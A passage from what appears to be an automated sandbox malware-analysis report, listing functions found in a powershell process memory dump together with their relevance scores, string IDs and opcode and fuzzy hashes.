                    • Instruction Fuzzy Hash: E3A149B17043558FCB398B6894947EBBBE6EFC6310F14C0ABE5459B252DA31CD84C7A2
                    Function 07CBA6F0 Relevance: 5.3, Strings: 4, Instructions: 267COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$4']q$4']q
                    • API String ID: 0-1785108022
                    • Opcode ID: d0fecaa0027ad897caf1dd4e6373fef066dfea1fe55263d2a4ab6c16d103b9bd
                    • Instruction ID: 7a67b24b5dcf085fffc01fe9dda45afe9c272b455bbab31dd20b7817fe43ab2b
                    • Opcode Fuzzy Hash: d0fecaa0027ad897caf1dd4e6373fef066dfea1fe55263d2a4ab6c16d103b9bd
                    • Instruction Fuzzy Hash: 6F91F7B1B04206CFCB349B3998846EEBBF5EFC5210F15C06AE585DB655DB32C941CBA1
                    Function 07CBBB10 Relevance: 5.1, Strings: 4, Instructions: 129COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$tP]q$tP]q
                    • API String ID: 0-3637193552
                    • Opcode ID: 856f836ef6365584c4010cc5d4e02a45ae35a0e25d518e132691c404917b542c
                    • Instruction ID: 286adff2d2875f29417ce746cfd17b66897e82ef8ec3aaa4058442eeafefc4bf
                    • Opcode Fuzzy Hash: 856f836ef6365584c4010cc5d4e02a45ae35a0e25d518e132691c404917b542c
                    • Instruction Fuzzy Hash: BF4118F1B002068FC734CF6985856AAFBA6EFC5710F14C46AE9499F259CB31CD41C7A1
                    Function 07CBDBC6 Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: XRbq$XRbq$tP]q$$]q
                    • API String ID: 0-2385373255
                    • Opcode ID: b045afb8f0ffc13118536d4f1625531d3b5fba43af4ea0fc0b025658eae752bc
                    • Instruction ID: 1e0c14e844d96dd054626e754f570776fc0762e09c5e505068d4b70a7986fb0b
                    • Opcode Fuzzy Hash: b045afb8f0ffc13118536d4f1625531d3b5fba43af4ea0fc0b025658eae752bc
                    • Instruction Fuzzy Hash: 9C4183B1B00105DFCB348E59C184BEAB7F2BB89711F55C059F4466B254C771DE80CBA1
                    Function 07CB1070 Relevance: 5.1, Strings: 4, Instructions: 94COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: $]q$$]q$$]q$$]q
                    • API String ID: 0-858218434
                    • Opcode ID: 3c4b482167707db86b55eac49e28d9c3deae735f7823fbd327eaa14a20527dd6
                    • Instruction ID: 4b5c2acac062d08ad4ea57294da1793f60808b6cf4ae055228557f459da5dbe2
                    • Opcode Fuzzy Hash: 3c4b482167707db86b55eac49e28d9c3deae735f7823fbd327eaa14a20527dd6
                    • Instruction Fuzzy Hash: 0A2137B171021A9BDB384A6E98A0BA7BBDA9BC1711F388826F946C7381DD75C9018361
                    Function 07CB840F Relevance: 5.1, Strings: 4, Instructions: 76COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: $]q$$]q$$]q$$]q
                    • API String ID: 0-858218434
                    • Opcode ID: 3e7b7b032f272f72a604a7a9cbc9eba75c4636d1fdb5c13d2fd752a7125c5d08
                    • Instruction ID: fa75dc0a3760ca3d839daba4892c0b60ed9035fdc9fa2c7aabbc8a17c772e5fc
                    • Opcode Fuzzy Hash: 3e7b7b032f272f72a604a7a9cbc9eba75c4636d1fdb5c13d2fd752a7125c5d08
                    • Instruction Fuzzy Hash: 5E21F2B2A00302DFDB358E5994D02F6BBF8AF82221F1884ABF84497141D735CA44CFE2
                    Function 07CB1B02 Relevance: 5.0, Strings: 4, Instructions: 46COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000007.00000002.3332120636.0000000007CB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 07CB0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_7_2_7cb0000_powershell.jbxd
                    Similarity
                    • API ID:
                    • String ID: 4']q$4']q$$]q$$]q
                    • API String ID: 0-978391646
                    • Opcode ID: eb997044c70b7f8b71cf91552c71830ba474b16d2c88c04f2fb91f27fc89771b
                    • Instruction ID: 55c53ae3cf404802877b98c0fd50af9be55d292cddf0c6beb0add2bc7ce2c283
                    • Opcode Fuzzy Hash: eb997044c70b7f8b71cf91552c71830ba474b16d2c88c04f2fb91f27fc89771b
                    • Instruction Fuzzy Hash: A901F7A170D3854FD73A152818701A9AFB29BC3910B2E41DBD480DB292DE254D0983A6